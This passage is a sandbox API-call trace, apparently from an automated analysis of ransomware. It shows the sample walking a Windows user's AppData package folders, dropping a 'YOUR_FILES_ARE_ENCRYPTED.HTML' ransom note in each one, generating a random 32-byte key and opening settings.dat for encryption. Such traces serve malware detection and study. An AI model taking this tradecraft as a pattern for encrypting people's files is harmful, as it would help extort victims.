nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.748] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.748] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.748] GetProcessHeap () returned 0x600000 [0116.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.749] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.749] CloseHandle (hObject=0x214) returned 1 [0116.750] GetProcessHeap () returned 0x600000 [0116.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.750] GetProcessHeap () returned 0x600000 [0116.750] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.750] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.750] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.750] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState") returned 106 [0116.750] GetProcessHeap () returned 0x600000 [0116.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.750] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState" [0116.750] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState\\*" [0116.750] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.750] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.750] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.750] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.750] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.750] GetProcessHeap () returned 0x600000 [0116.750] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.751] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.751] CloseHandle (hObject=0x214) returned 1 [0116.752] GetProcessHeap () returned 0x600000 [0116.752] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.752] GetProcessHeap () returned 0x600000 [0116.752] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.752] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.752] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.752] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState") returned 108 [0116.752] GetProcessHeap () returned 0x600000 [0116.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.752] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState" [0116.752] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState\\*" [0116.752] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0116.752] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.752] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.752] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0116.752] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.752] GetProcessHeap () returned 0x600000 [0116.752] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.753] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.754] CloseHandle (hObject=0x214) returned 1 [0116.754] GetProcessHeap () returned 0x600000 [0116.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.754] GetProcessHeap () returned 0x600000 [0116.754] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.754] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.754] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.754] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings") returned 104 [0116.754] GetProcessHeap () returned 0x600000 [0116.754] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.754] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings" [0116.754] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\*" [0116.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79b8381, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.755] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79b8381, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.755] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf76be6af, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.755] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.755] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 117 [0116.755] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.756] lstrlenW (lpString=".lock") returned 5 [0116.756] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.756] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7624aaf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7a50d3c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.756] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.756] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat") returned 117 [0116.756] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.756] lstrlenW (lpString=".dat") returned 4 [0116.756] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.756] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0116.756] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.756] GetProcessHeap () returned 0x600000 [0116.756] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.758] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="9F") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A1") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B9") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="CC") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="32") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6D") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="68") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="77") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="DD") returned 2 [0116.758] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="BE") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="90") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6F") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="A3") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="74") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="35") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="04") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="88") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="A0") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="5D") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="82") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FE") returned 2 [0116.759] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B5") returned 2 [0116.759] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="43") returned 2 [0116.759] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="46") returned 2 [0116.759] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="E8") returned 2 [0116.759] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="EC") returned 2 [0116.759] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="0A") returned 2 [0116.759] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="55") returned 2 [0116.759] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AE") returned 2 [0116.759] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="7C") returned 2 [0116.759] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="86") returned 2 [0116.759] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="62") returned 2 [0116.759] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.760] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.760] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.760] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf79b8381, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79b8381, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79b8381, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.760] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 122 [0116.760] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.760] lstrlenW (lpString=".LOG1") returned 5 [0116.760] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.760] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf79b8381, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79b8381, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79b8381, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.760] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 122 [0116.760] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.760] lstrlenW (lpString=".LOG2") returned 5 [0116.760] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.760] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf79b8381, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79b8381, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79b8381, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.760] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0116.760] GetProcessHeap () returned 0x600000 